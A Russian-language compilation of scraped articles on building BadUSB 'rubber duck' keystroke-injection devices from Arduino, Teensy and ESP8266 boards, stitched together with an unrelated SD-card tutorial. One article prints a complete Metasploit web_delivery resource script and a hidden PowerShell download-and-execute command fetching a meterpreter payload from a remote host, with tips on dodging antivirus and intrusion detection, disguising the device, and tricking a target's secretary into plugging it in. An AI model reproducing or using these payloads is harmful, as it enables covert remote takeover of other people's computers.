Как сделать флешку на ардуино

BadUSB устройство на базе arduino leonardo

12 августа, 2019

Для реализации примера нам понадобится:

Arduino на микроконтроллере atmega 32u4: http://ali.pub/3ncdj8

Важно:Данная статья создана исключительно для ознакомления, автор не несет ответственности за Ваши деяния и не побуждает повторять подобное. Статья создана исключительно в ознакомительных целях.

В этой статье я попробую рассказать о том как можно навредить вашему компьютеру через usb порт. Данный тип атаки на компьютер частенько используют хакеры и называется он Badusb.

BadUSB — класс хакерских атак, основанный на уязвимости USB устройств. Благодаря отсутствию защиты от перепрошивки в некоторых USB-устройствах, злоумышленник может видоизменить или полностью заменить оригинальную прошивку и заставить устройство имитировать любое другое устройство. BadUSB предназначен для доставки и исполнения вредоносного кода.

Так как микроконтроллер Atmega32u4 умеет работать как hit устройство (клавиатура или мышь) то можно написать код для имитации нажатия клавиш. Мы делали что-то подобное в статье когда использовали arduino leonardo и rfid метки для авторизации на компьютере. Тогда мы прикладывали авторизационную карточку и у нас вводился пароль от компьютера, как аз он вводился “имитацией нажатия клавиш” . Ссылка на статью тут.

И так, первый пример который я Вам покажу очень простой, мы сделаем так, что когда устройство подключим к компьютеру по usb, он у нас выключится. Назовем скетч “poweroff” Он выглядит следующим образом:

Данная программа при подключении к компьютеру вызывает командную строку и вводит команду “shutdown -s -f -t 0”, что приводит к выключению компьютера. Но есть одно но программа все корректно введет, если будет стоять английская раскладка клавиатуры. Существует несколько вариантов обхода данного неудобства, но пока я не буду Вам о них рассказывать, хватит для первого раза и этого. Данный скетч можно скачать по ссылке: https://yadi.sk/d/vha87lq2gB3nmQ

Еще есть вариант для поиграться, это вариант от AlexGyver он там делает из такого устройства имитацию разных нажатий и это будет очень раздражать. Ссылка.

С простыми примерами разобрались, теперь давайте немного усложним, а именно при подключении устройства к компьютеру устройство скачает архив с удаленного сервера, разархивирует из него два .bat файла, и запустит один из них. Тот .bat файл который мы запустим копирует второй файл в автозагрузку. BAT файл который мы отправим в автозагрузку будет при каждом включении компьютера создавать на рабочем столе текстовый файл с сообщением test. Естественно вы можете заменить .bat файлы на свои и сделать что-то другое, я лишь расскажу о способе доставки скриптов на Ваш компьютер для того чтоб Вы не допустили такого с Вашим ПК.

Итак скетч выглядит следующим образом:

На этом пока все, если тема интересна, то пишите предложения в комментариях или в комментариях под видео.

Видео с демонстрацией работы:

Источник

Урок 20. Подключение и работа с флеш картой на Arduino

В этом уроке мы научимся создавать, редактировать и удалять файлы на MicroSD карте.

Нам понадобится:

  • Piranha Uno R3 х 1шт.
  • Trema-модуль адаптер карт MicroSD х 1шт.
  • 6 проводной шлейф ПАПА-МАМА для подключения х 1шт.

Для реализации проекта не требуется установка дополнительных библиотек. Библиотека для работы с адаптером карт MicroSD входит в стандартный набор Arduino IDE > Эскиз > Include Library > SD.

Схема подключения:

Подключение адаптера карт MicroSD к Piranha Uno осуществляется к аппаратным выводам SPI (4 вывода: CS, SCK, MOSI, MISO).

Адаптер карт MicroSD Piranha Uno
CS (Chip Select) 10
SCK (Serial ClocK) 13
MOSI (Master Out Slave In) 11
MISO (Master In Slave Out) 12
Vcc 5V
GND GND

Питание:

Питание адаптера подаётся на выводы Vcc и GND, напряжением 5В постоянного тока.

Базовые функции, для работы с файлами SD-карты:

Создадим два скетча. В первом будим создавать файл и записывать в него информацию, а во втором, удалим созданный файл.

Создание файла:

если подключить адаптер карт MicroSD к Piranha Uno, подключить Piranha Uno к ПК, загрузить скетч, вставить SD-карту и запустить Монитор последовательного порта, то в мониторе будут выведены следующие строки:

file doesn’t exist (файл не обнаружен)
file is opened (файл открыт)
data written to the file (данные записаны в файл)
file is closed (файл закрыт)
file exists (файл обнаружен)

а на SD-карте появится файл «iarduino.txt» с одной строкой «The beginning of a line, The end of the line».

Если загрузить скетч при вставленной в адаптер карт MicroSD SD-картой, то на SD-карте появится файл «iarduino.txt» с двумя строками «The beginning of a line, The end of the line», а первой строкой в мониторе последовательного порта будет «file exists» (файл обнаружен ) .

Дело в том, что функция setup() в обоих случаях выполняется дважды (сразу после загрузки скетча и после запуска монитора последовательного порта). Но в первом случае, после загрузки скетча, SD-карты не было в адаптере, следовательно, файл «iarduino.txt» был создан только после запуска монитора последовательного порта .

Удаление файла:

если подключить Trema-модуль адаптер карт MicroSD к Arduino Uno, подключить Arduino Uno к ПК, загрузить скетч, вставить SD-карту и запустить Монитор последовательного порта, то в мониторе будут выведены следующие строки:

file exists (файл обнаружен)
file deleted (файл удалён)
file doesn’t exist (файл не обнаружен)

Источник

Взлом компьютера за 3 секунды. Делаем USB-уточку с нуля на Arduino

Начнём с традиционного «Этот материал представлен только в образовательных целях». Если вы используете эту информацию для взлома HBO и выпуска следующего сезона «Игры престолов» бесплатно на YouTube, ну… здорово. В том смысле, что я никак не поощряю подобное поведение.

Если не знаете, что такое «резиновая уточка» (USB Rubber Ducky), это устройство, которое сделал Hak5, на фото. Оно выглядит и ведёт себя как обычная флешка, но её можно запрограммировать на очень быстрый ввод клавиш с клавиатуры. «Уточка» способна взломать любую систему за несколько секунд. Единственный недостаток — вам понадобится физический доступ к компьютеру. И ещё она стоит $50, вот почему я написал эту статью.

Мы используем 5V Adafruit Trinket и кабель microUSB — вот и всё, что нам понадобится.

К счастью, Adafruit предоставляет библиотеку для интерфейса клавиатуры по USB, так что сразу делаем #include . Вам понадобится установить библиотеку, следуя этой инструкции.

Можем поиграться с библиотекой для начала, начнём с инициализации флэшки как HID-устройства методом begin().

Выглядит неплохо. Теперь запустим команды на компьютере жертвы. Это можно сделать, «нажав» клавишу Windows, набрав cmd, Enter, а затем саму команду.

Отлично. Создадим эксплоит во фреймворке Metasploit.

Будем использовать модуль web_delivery. Я выбрал его из-за высокой скорости и низкой вероятности срабатывания антивируса. Он также ничего не пишет на диск, так что не оставит следов по окончании работы.

Здесь мы ломаем 64-битную Windows 10, так что выберем мишенью PowerShell, но имейте в виду, это не эксплоит против PowerShell. Мы просто используем оболочку, чтобы скачать нужные файлы с сервера.

Нужно сказать нашей программе, откуда брать бинарники:

Дальше указываем порт, который не вызовет подозрений, что насчёт 443? ;)

Metasploit каждый раз генерирует случайный URIPATH, а мы хотим иметь возможность запускать и останавливать прослушку порта в любой момент без необходимости перекомпилировать код для флешки.

Теперь нужно выбрать Powershell в качестве метода доставки. Эксплоит поддерживает три цели, помеченные идентификаторами: это 0: Python, 1: PHP, и 2: Powershell.

Теперь задаём полезную нагрузку. Я использую reverse_https, ведь мы работаем по 443-му порту. Для большинства систем обнаружения вторжений будет выглядеть как обычное соединение.

set PAYLOAD windows/meterpreter/reverse_https

И наконец exploit .

Чтобы удобно было останавливать и возобновлять прослушку порта, создадим конфигурационный файл: usb.rc.

use exploit/multi/script/web_delivery
set LHOST 1.2.3.4
set LPORT 443
set URIPATH /
set TARGET 2
set PAYLOAD windows/meterpreter/reverse_https
exploit

Получаем полезную нагрузку для запуска на компьютере жертвы:

powershell.exe -nop -w hidden -c $N=new-object net.webclient;$N.proxy=[Net.WebRequest]::GetSystemWebProxy();$N.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $N.downloadstring(‘http://1.2.3.4:8080/’);

Теперь можем запустить это с флэшки.

Работает очень неплохо. Нам нужно около 40 секунд, чтобы поиметь Дейнерис, я имею в виду компьютер жертвы.

Из-за ограниченной мощности «уточки» загрузчик не доступен постоянно, как в обычной Arduino, вы можете загрузить код только когда нажмёте кнопку на флешке или в течение первых 30 секунд работы. То есть первые 30 секунд после подключения флешки мы ждём, пока код реально сработает, а затем ещё 10 секунд для набора и выполнения скрипта. Было бы очень полезно сократить время доступа на 75%. Вот этот хороший человек отредактировал прошивку, чтобы пропустить загрузчик при подключении. Мы взяли код и перепрошили флэшку, перезагрузили код и та-дам — всё работает. Но можно сделать ещё лучше: хорошо бы спрятать микросхему в корпус, чтобы она не вызывала подозрений.

Я выбрал одну из тех неприметных USB-флешек, которые рекрутеры раздают миллионами, и заказал эти классные маленькие OTG-адаптеры microUSB − USB A. Пришлось отрезать ненужные части печатной платы, чтобы она поместилась в корпус, всунул OTG-адаптер в корпус USB A и заклеил всё суперклеем. По мне так выглядит вообще не подозрительно, но всё-таки 10 секунд — это немалое время, особенно когда прячешься от драконов.

Вы также можете заказать Arduino Pro Micro на Amazon примерно за $10. Если есть терпение, то можно даже найти на eBay примерно за $3 или $4. У меня не нашлось USB-флэшки достаточно большого размера для Pro Micro, так что я подключил OTG-адаптер, перемотал его изолентой и на этом успокоился.

Нужно немного изменить программу, потому что мы используем другую библиотеку, но работать она будет как и раньше.

Самое большое преимущество Pro Micro — это скорость. Теперь нам нужно всего 3 секунды физического доступа. Настоящая атака на ходу. Если вы намерены применить эту силу, делайте это ради благого дела. Убейте Серсею.

Источник

Статья Bad Usb или как я уток разводил, Практическое пособие по Rubber Duck

Решил я как-то хозяйство дома завести, благо земли хватает вдоволь. Выбор остановил на утках. Знающие люди сказали, что от них куда больше пользы, чем от кур да и вкуснее они. Началось с того (как это частенько бывает), что узнал я про этих уток не из новостных лент, я практически от первоисточника, а точнее всеми любимого DEFCON-а. Заинтересовало меня их послание, хотя, если честно, не скажу, что я да и другие разработчики не догадывались об этом раньше, но ребята потрудились на славу и выдали миру весьма полезную информацию, касаемо этих самых уток и дали им звучное имя Rubber Duck. Как Вы догадались, эта порода уток ни что иное, как Bad Usb.

Первый блин комом

Как водится у хорошего хозяина, не все сразу ладится, так как первый опыт разведения этой породы мерзо-уток по сути ничем хорошим не увенчался, трудности возникли уже на первом этапе, когда я заглянул в список, предлагаемых авторами проекта уязвимых девайсов, который в основном состоял из (нифига не дешевых на тот момент) USB 3.0 флэшек и тем паче еще и с довольно большим объемом памяти. Выложить ради сомнительных экспериментов пару косарей — перспектива, как мне тогда виделось, ничуть не радужная, но, чем не пожертвуешь ради науки. С горем пополам мне таки удалось найти необходимый девайс, потратив около (недели!!) на поиски. Вооружившись ноутбуком, распечатками ворованной спецификации на Phison 2251-03 и, собственно, самой уткой, я приступил к экспериментам. Ни одна банка Adrenaline была выпита, ни одна сигарета скурена, в итоге родилось устройство и оно заработало, не ахти как, если честно. Ожидаемые результаты сильно разнились с радужными предположениями, приходящими ко мне в красочных снах. Устройство было капризным, глючным, работало не всегда и не с первого раза, в связи с чем идея продолжения показалась мне утопической и была заброшена в «долгий ящик».

Новая порода уток

И вот настала эра Teensy. Этот проект появился значительно позже, но в силу специфичности контроллера обещал быть куда более перспективным, чем колдунства с флэшками. Приобрел Teensy 3, и первым, что залил в него (кстати совсем без танцев с бубнами) через обычный Arduino IDE + модуль поддержки Teensy (следует заметить, что корректно устанавливался он только с версией IDE 1.8.0) со всеми остальными драйвера наотрез отказывались искать исполняемый файл иде-шки, был скетч открывающий сессию meterpreter на атакуемой машине на Windows. Контроллер мне понравился- работал шустро, бойко и безглючно. Единственной сложностью казался злополучный разъем Micro USB который я решил заменить на обычный. В итоге родилось вот что:

Teensy 3.1 в утиной шкуре

Сам скетч значительно отличался от тех детский писулек, которые представляли из себя rubber dack скрипты, написанные по принципу «подойди к окну, два раза подпрыгни, повернись налево..). Собственно вот сам скетч. KernelEquinox/Teensyterpreter

Здесь нам достаточно просто вставить значения своего IP адреса и порта в HEX формате (в тексте кода это прокоментировано) и собственно можно сразу использовать. Работает четко и очень быстро. Тут вообщем пояснения излишни, девайс откроет шелл meterpreter reverse tcp открыли метасплоит и ждем «клиента». Единственный (как мне казалось на тот момент) минус девайса в том, что он нифига не persistence и после перезагрузки с долгожданной сессией можно распрощаться. Ну да фиг с ним. Не успел я толком наиграться с Teensy-уткой, как на птичий рынок повалили новые и доселе незведданные зверюшки всех парод и мастей заграничных.

Глаза разбегались от такого ассортимента, но я остановил свой выбор на этот раз на Arduino pro micro (некое подобие Leonardo, но куда более миниатюрное) на очень интересном контроллере ATMEGA 32U4. Его спецификация прямо скаже внушала доверие. 16Мгц процессорной шустрости, 32 КБ памяти для программулек и, самая важная вишенка на торте- наличие на борту полноценного порта USB. То есть не того жалкого подобия, которым оснащены отладочные платы других ардуинок, которые являются ни чем иным, как просто входом UART программатора для прошивки, а именно полноценным портом со всеми вытекающими. Я купил два вот таких зверька-

Две вариации ARDUINO PRO Micro

и счастливый поехал эксперементировать. Вот тут моя радость была несколько омрачена очередными танцами с бубном. Так система определяет подключенное устройство по команде lsusb

В очередной раз порадовал Linux -вообще никаких заморочек с установкой дров. Теперь о бубнах и о танцах. Бединушка, собственно в том, что нет на плате кнопки reset так как братья Китайцы, хоть и радуют нас постоянно своими новинками, но все же почему то решили, что плата сама должна отработать команду RESET при прошивке, так вот именно здесь мы и наступаем на первые грабли. Залив любой скетч эмуляции клавиатуры, мы уже заставляем наш девайс вести себя как клавиатура, как только он унюхает 5 вольт питания, и вот здесь начнутся разногласия, при попытке залить новый скетч. То есть -мы заливаем скетч через USB разъем, выбирая созданый платой виртуальный (именно ВИРТУАЛЬНЫЙ!) порт, который она создает, но поскольку в нейт уже залит наш предыдущий скетч, работающий как эмулятор клавиатуры, то соответственно наблюдаем конфликт интересов. Плата наотрез отказывается делиться портом, используемым для выполнения программы с ARDUINO IDE которая хочет заюзать этот же порт под свои (а точнее наши) не менее корымтные цели. Ну вы примерно поняли, о чем идет речь, но это не все траблы, которые скрываются в утиной шкуре. Теперь включаем воображение и пытаемся представить проблемму в общеглобальном масштабе. Мы залили скетч в нашу про-микро, который, например, открывает на VICTIM машине Powershell, выполняя ряд манипуляций с командной строкой и прописывая туда необходимые команды, но мы надумали залить туда скетч новый, скомпилировали в IDE, вставили про-микро в порт и. началась свистопляска под рок-музыку.

Представьте что в процессе ваших манипуляций с новой прошивкой к компу подключили еще одну клавиатуру и какой-то чувак начал клацать на ней свои команды. Теперь суть проблеммы в полной мере?))) Логичен вывод, что для загрузки скетча в нашу утку, нужно нажать reset и тем самым остановить выполнение программы, но тут еще одна проблемма всплывает- когда вы жмете reset (к слову его нужно вывести самостоятельно на кнопку. На плате его нет) то виртуальный порт, который мы уже выбрали в Arduino ide попросту пропадает и ИДЕ-шка начинает материться нехорошими словами , оповещая нас о недоступности порта. Натанцевавшись с бубном вдоволь, нашел таки решение- вставлять утку нужно с зажатой кнопкой резет и отпускать ее перед надписью UPLOAD тогда иде должна подхватить порт девайса.

Но важное замечание — ОЧЕНЬ желательно, чтобы никаких других устройст USB (кроме клавы и мыши) подключено не было, в этом случае ИДЕ автоматом подхватит порт, который появится в списке доступных после подключения про-микро. Ну на этом танцы с бубном, вроде закончились. В ардуино ИДЕ платы PRO Micro не существует, выбирать нужно Leonardo, да собственно и загрузчик китайцы зашили туда леонардовский.

Утята учатся летать

Итак поколение уток вырастил. Доволен всем, примеры скетчей приводить не стал, так как в сети их полно и восновном ничего нового, аж скучно, но вот бесконечные блуждания по глубинам Github вывели меня на спаривание Pro-micro с esp-12 модулем, что позволит управлять нашей уткой по воздуху. Ура-летим!
Что же мы получим в итоге?

Гибрид Arduino pro nicro и ESP8266 (ESP-012) со стороны преобразователя 3.3 в

то-же с торца. Видно спаяные все 3 модуля.

гибрид получился весьма маленький и размером не больше флэшки. После нижеописанных манипуляций с прошивкой, вставляем девайс в комп и наблюдаем следующую картину- esp- ха поднимает точку доступа (ее настройки можно изменить при первом запуске либо в самом коде) подключившись к которой мы заходим на вэб морду пунктом управления уткой.

вэб панель управления уткой

Здесь раздолье для работы. Скрипты можно писать прямо здесь и отдавать команду на запуск. Можно поставить на автозапуск любой из них. Можно их сохранять прямо в память и называть как угодно для удобства. Можно скрипт скачать на комп или телефон а так же закачать на утку с компа или телефона просто методов копи-паста текста кода прямо в окно редактирования. Любой сохраненный скрипт можно отредактировать либо вообще удалить за ненадобностью. Предусмотрен даже терминал UART дляя общения с устройством по принципу двухстороннего монитора порта. Вобщем арсенал внушительным оказался.

словарь с командами под рукой. очень удобно

меню настройки Wifi

UART терминал тоже под рукой с HELP страницей

Но и здесь не все так гладко. Дело в том, что на плате Arduino pro-micro нет вывода питания 3.3 вольта, которое необходимо для ESP-12 (Совсем забыл- использовать нужно именно 12 либо 07 но с объемом флэш памяти 3М иначе на написание скриптов памяти не останется.) Всвязи с чем пришлось ставить малюсенькую платку преобразователя 5V-3.3V и как минимум на 500 мА, так как ESP оказалась весьма «жадной до току» и жрет в режиме работы аж 150 мА временами. В процессе работы вся конструкция греется. Не скажу, что прямо сильно, но греется. На работу никак не влияет (в плохом смысле). Вот собственно сам GitHub этого проекта (замечу, три месяца назад обновился, а обновление можно прошить прямо через вэб морду)

GitHub — SpacehuhnTech/WiFiDuck: Wireless keystroke injection attack platform

В прошивке этих девайсов сложностей нет, за исключением того, что было описано выше насчет бубнов с прошивкой Pro micro. Касаемо ESP , то один нюанс все же есть. Она должна шиться как плата Dstrike ESP8266 но о этих нюансах подробно написано на сайте проекта.

Имя нам — легион!

Казалось-бы о чем еще то мечтать? Получили в распоряжение летающую утку, да еще и ручную! Сделаешь все, что скажет. Но нет же. Нет предела человеческой фантазии и нет границ возможностей. И вот в этом штиле благополучия утиного зародился вообще умопомрачительный проект новой утки, которую автор наградил искуственным интеллектом. Хоть, как предыдущая. летать она не умеет, зато умеет она автоматически определять машину, в которую ее воткнули, точнее систему. установленную на этой машине и в соответствии результатами сканирования выполнять заранее заготовленный код для той или иной системы. Где это может быть полезно для Нас-исследователей и для Них-злоумышленников?

А вот Вам пару примеров. Пришли вы к потенциальной жертве, а у жертвы стоит на компе винда с линуксовой оболочкой либо с маковской (ну знаете, есть такие фичи) Времени разбираться что за система нет. Воткнули по быстрому, утка сама разберется и все сделает. Вот еще пример: Вашу рожу потенциальная жертва узнает и в толпе на площади и вход к нему (ней) в кабинет Вам заказан. Зато Вы нет-нет загуливаете с его секретаршей или (не дай Бог женой) в пьяном угаре, пока Его в командировку отправили. И вы всучиваете утку той самой «жене-секретарше» так как ввиду ее блондинистости она не сможет вам внятно объяснить, какая операционка стоит на Его компе. Да и вообще едва ли научилась выговаривать это слово «операционка».. Суть вобщем ясна. В данном «дефолтном» варианте код практически пустой. Соответствующие команды для выполнения в случае
обнаружения той или иной ОС необходимо дописать вручную по вашему желанию, что они должны будут делать. Краткий гайд по установки из README.

  1. Скачать данный репозиторий — joelsernamoreno/PoC-BadUSB_DetectOS
  2. Распоковать (или клонировать) в рабочую папку Arduino
  3. Папку Keyboard из libraries папки проекта скопировать в папку Libraries рабочей папку Arduino
  4. Папку FingerprintUSBHost так-же скопировать в Libraries рабочей папки Arduino
  5. Открываем скетч PoC-BadUSB_DetectOS.ino в ARDUINO IDE
  6. Выбираем плату Arduino Leonardo и соответствующий порт
  7. Компилируем и загружаем на плату.

В дефолтном виде код просто определяет систему на машине жертвы и открыват текстовй редактор прописывая банальный HELLO WORLD

Но. Заменив этот код своей полезной нагрузкой получаем боевую машину

Красным выделен участок кода, который относится к определенной и именно он выполняется после определения ОС. Соответственно его мы и меняем на свой. Аналогично и с другими операционками.

код скрипта определяющего ОС Windows с исполняемой частью

Утиная ферма растет и развивается, значит мои надежды оправдались. Технологии летят вперед с астрономической скоростью и порой за ними трудно угнаться. Вот и мы с вами стали свидетелями стремительного развития совсем недавно родившегося проекта BADUSB. Единственное, чем хотелось бы дополнить утку последней ревизии- это автоопределение раскладки клавиатуры, но это тема уже была описана ранее и осталось найти время, чтобы скомпоновать все в одно целое.

Источник

Adblock
detector